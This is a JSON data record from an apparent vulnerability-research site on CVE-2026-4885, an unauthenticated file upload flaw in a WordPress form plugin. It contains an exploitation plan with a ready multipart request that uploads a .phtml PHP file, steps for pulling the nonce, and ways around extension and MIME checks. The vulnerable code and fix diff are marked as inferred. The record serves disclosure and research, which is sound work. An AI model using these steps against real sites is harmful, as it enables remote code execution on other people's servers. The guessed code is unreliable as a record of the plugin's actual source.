[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fJwpD22EWVmZERZIq0uwBI5ZyF-j1M022h_Q23Wu8H3w":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-4885","piotnet-addons-for-elementor-pro-unauthenticated-arbitrary-file-upload-via-form-file-upload","Piotnet Addons for Elementor Pro \u003C= 7.1.70 - Unauthenticated Arbitrary File Upload via Form File Upload","The Piotnet Addons for Elementor Pro plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the 'pafe_ajax_form_builder' function in all versions up to, and including, 7.1.70. The plugin uses an incomplete extension blacklist that only blocks php, phpt, php5, php7, and exe extensions, while allowing dangerous extensions such as .phar or .phtml to be uploaded. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The exploit can only be exploited if a file field is added to the form.","piotnet-addons-for-elementor-pro",null,"\u003C=7.1.70","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2026-05-18 18:28:38","2026-05-19 06:46:46",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fffff2ff3-769d-4eb2-acbe-d8ce6f042581?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-4885 - Piotnet Addons for Elementor Pro\n\n## 1. Vulnerability Summary\nThe **Piotnet Addons for Elementor Pro** plugin (up to version 7.1.70) contains an unauthenticated arbitrary file upload vulnerability. The flaw exists in the `pafe_ajax_form_builder` function, which handles form submissions. While the plugin attempts to restrict file uploads, it uses an incomplete extension blacklist that fails to block executable extensions like `.phar`, `.phtml`, `.pht`, or `.php3-7`. An unauthenticated attacker can exploit this by submitting a form containing a file upload field to execute remote code on the server.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `pafe_ajax_form_builder`\n- **Method:** `POST` (Multipart\u002Fform-data)\n- **Vulnerable Function:** `pafe_ajax_form_builder()`\n- **Required Parameter(s):**\n    - `action`: `pafe_ajax_form_builder`\n    - `pafe_ajax_form_builder_nonce` (or similar, inferred from common Piotnet patterns)\n    - `form_id`: The ID of the Piotnet form.\n    - `file_fields`: An array or specific key mapping to the file upload field in the form.\n- **Authentication:** None required (unauthenticated).\n- **Precondition:** A page must exist containing a Piotnet Form with at least one \"File Upload\" field.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** An unauthenticated user sends a `POST` request to `admin-ajax.php` with the action `pafe_ajax_form_builder`.\n2. **Hook Registration:** The plugin registers the action via `add_action('wp_ajax_nopriv_pafe_ajax_form_builder', 'pafe_ajax_form_builder')`.\n3. **Nonce Verification:** The function likely checks a nonce passed in the request (e.g., `$_POST['nonce']`).\n4. **File Processing:** The function iterates through `$_FILES`.\n5. **Validation Failure:** It checks the file extension against a blacklist: `['php', 'phpt', 'php5', 'php7', 'exe']`.\n6. **Bypass:** Since `.phtml` or `.phar` are not in the blacklist, the validation passes.\n7. **Sink:** The file is moved to the uploads directory (likely `wp-content\u002Fuploads\u002Fpiotnet-addons-for-elementor\u002F` or a date-based WordPress folder) using `move_uploaded_file()`.\n\n## 4. Nonce Acquisition Strategy\nPiotnet Addons typically exposes nonces through localized JavaScript objects.\n1. **Identify Script:** The plugin enqueues scripts for its form builder on pages where a form is present.\n2. **Create Test Page:**\n   ```bash\n   wp post create --post_type=page --post_title=\"Piotnet Form\" --post_status=publish --post_content='[pafe-form id=\"123\"]'\n   ```\n   *(Note: The actual shortcode might vary, e.g., it might be an Elementor-embedded widget. If using Elementor, the form ID is crucial).*\n3. **Extract via Browser:**\n   Navigate to the page and use `browser_eval` to find the nonce and form configuration:\n   ```javascript\n   \u002F\u002F Common localization keys for Piotnet\n   window.pafe_form_builder_object?.nonce\n   \u002F\u002F OR\n   window.pafe_ajax_object?.nonce\n   ```\n4. **Identify Form ID:** The `form_id` is usually found in the `data-form-id` attribute of the form's HTML container.\n\n## 5. Exploitation Strategy\n### Step 1: Preparation\n- Create a Piotnet Form with a File Upload field.\n- Note the `form_id` and the field's `name` attribute (e.g., `form_fields[field_abcdef]`).\n\n### Step 2: Nonce Extraction\n- Navigate to the page containing the form.\n- Extract the nonce using `browser_eval`.\n\n### Step 3: Payload Delivery\nSend a multipart\u002Fform-data request to `admin-ajax.php`.\n\n**Request Mockup:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: multipart\u002Fform-data; boundary=----WebKitFormBoundaryABC123\n\n------WebKitFormBoundaryABC123\nContent-Disposition: form-data; name=\"action\"\n\npafe_ajax_form_builder\n------WebKitFormBoundaryABC123\nContent-Disposition: form-data; name=\"pafe_ajax_form_builder_nonce\"\n\n[EXTRACTED_NONCE]\n------WebKitFormBoundaryABC123\nContent-Disposition: form-data; name=\"form_id\"\n\n[FORM_ID]\n------WebKitFormBoundaryABC123\nContent-Disposition: form-data; name=\"form_fields[field_upload_id]\"; filename=\"exploit.phtml\"\nContent-Type: application\u002Foctet-stream\n\n\u003C?php echo \"VULNERABLE: \" . phpversion(); ?>\n------WebKitFormBoundaryABC123--\n```\n\n### Step 4: Execution\nThe server should respond with a JSON object indicating success and potentially the file URL. If the URL is not returned, the file is likely located in:\n`\u002Fwp-content\u002Fuploads\u002Fpiotnet-addons-for-elementor\u002F[YEAR]\u002F[MONTH]\u002Fexploit.phtml`\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure `piotnet-addons-for-elementor-pro` version \u003C= 7.1.70 is active.\n2. **Create Form:** Use the `wp-cli` or Elementor editor to create a form with:\n    - Form Name: `Exploit Test`\n    - Field 1: `File Upload` (ID: `field_upload_id`)\n3. **Publish Page:** Embed this form on a new public page.\n\n## 7. Expected Results\n- The AJAX response should return `{\"success\":true,...}`.\n- Navigating to the uploaded `.phtml` file URL should execute the PHP code and display the PHP version.\n\n## 8. Verification Steps\n1. **Check Filesystem:**\n   ```bash\n   find \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002F -name \"exploit.phtml\"\n   ```\n2. **Confirm Execution:**\n   ```bash\n   # Use http_request to fetch the uploaded file\n   # Expected output: \"VULNERABLE: 7.4.x\" (or similar)\n   ```\n\n## 9. Alternative Approaches\n- **Extension Variation:** If `.phtml` is blocked by server-level configurations (e.g., `.htaccess`), try `.phar`, `.php3`, `.php4`, `.php5`, or `.pht`.\n- **Double Extensions:** Try `exploit.php.jpg` (if the blacklist only checks the last extension and the server is misconfigured to execute the first known extension).\n- **MIME Type Spoofing:** Change `Content-Type: application\u002Foctet-stream` to `image\u002Fjpeg` in the multipart request to bypass superficial MIME checks.","Piotnet Addons for Elementor Pro (up to 7.1.70) is vulnerable to unauthenticated arbitrary file upload due to an incomplete extension blacklist in the 'pafe_ajax_form_builder' function. Attackers can upload files with dangerous extensions like .phar or .phtml to execute remote code, provided the form contains a file upload field.","\u002F* Inferred from vulnerability description: pafe_ajax_form_builder function *\u002F\n\u002F\u002F The plugin checks against a blacklist:\n$blacklist = ['php', 'phpt', 'php5', 'php7', 'exe'];\n$ext = pathinfo($filename, PATHINFO_EXTENSION);\nif (in_array($ext, $blacklist)) {\n    \u002F\u002F block upload\n} else {\n    \u002F\u002F allow upload - Missing extensions like .phtml, .phar, .php3, etc.\n    move_uploaded_file($temp_file, $upload_path);\n}","--- a\u002Finc\u002Fpafe-ajax-form-builder.php\n+++ b\u002Finc\u002Fpafe-ajax-form-builder.php\n@@ -10,7 +10,14 @@\n- $blacklist = ['php', 'phpt', 'php5', 'php7', 'exe'];\n+ $allowed_extensions = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'zip', 'txt'];\n  $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));\n- if (in_array($ext, $blacklist)) {\n+ if (!in_array($ext, $allowed_extensions)) {\n    wp_send_json_error(['message' => 'Invalid file type.']);\n+   wp_die();\n  }","The exploit target is the 'pafe_ajax_form_builder' AJAX action. An unauthenticated attacker identifies a page containing a Piotnet form with a file upload field and extracts the required nonce (often localized in window.pafe_ajax_object). A multipart POST request is then sent to wp-admin\u002Fadmin-ajax.php including the action, the extracted nonce, the form ID, and a malicious payload with a bypassed extension such as .phtml or .phar. If successful, the file is saved to the WordPress uploads directory, allowing for direct execution via browser execution to achieve remote code execution.","gemini-3-flash-preview","2026-05-20 17:17:47","2026-05-20 17:18:13",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpiotnet-addons-for-elementor-pro\u002Ftags"]